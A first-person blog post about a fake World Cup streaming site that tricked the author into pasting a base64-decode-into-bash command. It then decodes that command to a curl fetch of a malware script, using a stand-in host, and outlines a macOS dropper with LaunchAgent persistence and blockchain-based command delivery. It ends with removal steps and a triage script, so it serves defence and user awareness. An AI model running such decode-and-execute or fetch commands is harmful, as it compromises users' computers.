Almost Got Hacked!

I almost got hacked today. I was looking for a free online stream of the FIFA World Cup 2026, found a shady website, and did exactly what it told me to do. In my defense, kickoff was soon.

How it started

The site claimed to stream the World Cup for free and walked me through four steps:

  1. Press cmd + space
  2. Type terminal and press enter
  3. Press cmd + V to paste (no mention of when anything was copied to my clipboard)
  4. Press enter

Any rational person would have stopped. I didn't — I was too eager to watch the match to think clearly.

What I pasted

The clipboard held something like:

Bash
bash "echo "<some short base64 string>" | base64 -d | bash"

I pasted it and pressed enter. macOS immediately flagged it as malware and blocked it. No harm was done to my system.

That's when I learned about XProtect — Apple's built-in anti-malware system. It keeps a signature list of known malicious scripts and blocks matches before they run. This one was already in the database, which is the only reason nothing bad happened.

Going down the rabbit hole

By then I had completely forgotten about the World Cup.

I ran history to recover the command. Nothing — the script never executed, so there was nothing to find.

Decoding the base64 manually gave me something like this (the link is fake here, but it's real in the actual script):

Bash
curl -fsSL https://example.com/malware.sh

I fetched the script without executing it:

Bash
curl -fsSL https://example.com/malware.sh | cat

The output was an osascript command wrapping another large base64 payload. Claude declined to analyze it, citing security policy. ChatGPT did. Here's what it found.

What the malware does

A multi-stage macOS dropper: AppleScript, persistent LaunchAgent, and the Polygon blockchain as a command-delivery channel.

Stage 1 — Persistence. Creates ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist and registers it with launchctl. The plist sets RunAtLoad (runs at login) and KeepAlive (relaunches if killed).

Stage 2 — Obfuscated payload. The LaunchAgent runs echo '<base64>' | base64 -d | osascript. The AppleScript rebuilds strings character by character — (character id 112) & (ASCII character 111) & ... — to evade static analysis.

Stage 3 — Blockchain C2. The script hits Polygon RPC endpoints (polygon.drpc.org, polygon.publicnode.com, polygon-mainnet.gateway.tatum.io, tenderly.rpc.polygon.community), trying each in sequence. It sends a JSON-RPC eth_call to a hard-coded smart contract, extracts the hex result (0x...), decodes it to text, and pipes it into osascript:

Text
Polygon RPC → eth_call → hex response → decode → osascript → execute

The attacker can change behavior anytime by updating what the contract returns — no traditional C2 server, and the on-disk payload never needs updating.

Verdict: persistent macOS backdoor with remote code execution, using Polygon RPC as command transport. High severity. The blockchain layer delivers attacker commands, not just wallet reconnaissance.

If you ran this script

Look for these:

Bash
ls ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
ls ~/Library/ifipbqmfnnywqguz
launchctl list | grep ifipbqmfnnywqguz

If you find them, do this:

Bash
launchctl unload ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
rm ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist

Also check for similarly named random directories under ~/Library/.
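An added example, not code from the post: a small Python triage script that generalizes the manual checks above to every agent under a LaunchAgents directory, flagging entries that combine the dropper's traits (RunAtLoad plus KeepAlive, a base64-decode-into-osascript or curl-into-shell command line, a random-looking label). It runs against a constructed sample directory; the label is the one from the post, the base64 string is a placeholder, and the random-label check is a heuristic of my own.

```python
import plistlib
import re
import tempfile
from pathlib import Path

# Command-line shapes taken from the dropper described above: an embedded
# base64 blob decoded into osascript/a shell, or curl piped straight into a shell.
PAYLOAD_PATTERNS = [
    re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:osascript|bash|sh|zsh)\b"),
    re.compile(r"\bcurl\b.*\|\s*(?:bash|sh|zsh)\b"),
]


def looks_random(label: str) -> bool:
    """Heuristic (my assumption): a long, vowel-poor, all-lowercase final component, e.g. com.ifipbqmfnnywqguz."""
    tail = label.rsplit(".", 1)[-1]
    if len(tail) < 12 or not tail.isalpha() or not tail.islower():
        return False
    return sum(ch in "aeiou" for ch in tail) / len(tail) < 0.25


def triage_plist(path: Path) -> dict:
    """Collect the persistence indicators present in one LaunchAgent plist."""
    with path.open("rb") as fh:
        plist = plistlib.load(fh)
    cmdline = " ".join(str(a) for a in plist.get("ProgramArguments", []))
    reasons = []
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive")
    if any(p.search(cmdline) for p in PAYLOAD_PATTERNS):
        reasons.append("decode-and-execute command line")
    if looks_random(str(plist.get("Label", path.stem))):
        reasons.append("random-looking label")
    return {"path": str(path), "label": plist.get("Label"), "reasons": reasons}


def scan_launch_agents(directory: Path) -> list:
    """Return agents showing at least two indicators; one alone (e.g. RunAtLoad) is common for benign software."""
    results = [triage_plist(p) for p in sorted(directory.glob("*.plist"))]
    return [r for r in results if len(r["reasons"]) >= 2]


def build_sample_dir() -> Path:
    """Constructed stand-in for ~/Library/LaunchAgents: one benign agent, one mimicking the dropper (placeholder payload)."""
    root = Path(tempfile.mkdtemp())
    agents = [
        {"Label": "com.example.updater", "ProgramArguments": ["/usr/local/bin/updater", "--check"], "RunAtLoad": True},
        {"Label": "com.ifipbqmfnnywqguz", "RunAtLoad": True, "KeepAlive": True,
         "ProgramArguments": ["/bin/sh", "-c", "echo 'PLACEHOLDER_BASE64' | base64 -d | osascript"]},
    ]
    for agent in agents:
        with (root / f"{agent['Label']}.plist").open("wb") as fh:
            plistlib.dump(agent, fh)
    return root


if __name__ == "__main__":
    for finding in scan_launch_agents(Path.home() / "Library" / "LaunchAgents"):
        print(finding)
```

On current macOS, launchctl bootout gui/$(id -u)/<label> is the supported replacement for launchctl unload; after removing the plist, confirm the label no longer appears in launchctl list.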

What I took away

Simple social engineering — urgency plus a plausible streaming site — almost worked on someone who knows what a terminal is.

  • Don't paste commands into Terminal because a website told you to.
  • base64 -d | bash is almost never something a legitimate site needs you to run.
  • XProtect helped, but it only covers known signatures. New variants can slip through.

Glad the script was blocked, glad I understood what it would have done, and glad I can share this from an uncompromised laptop. Shoutout to Apple for protecting me from myself, and to ChatGPT for analyzing the script.

Now I'm going to watch the World Cup the legal way.

Until next time!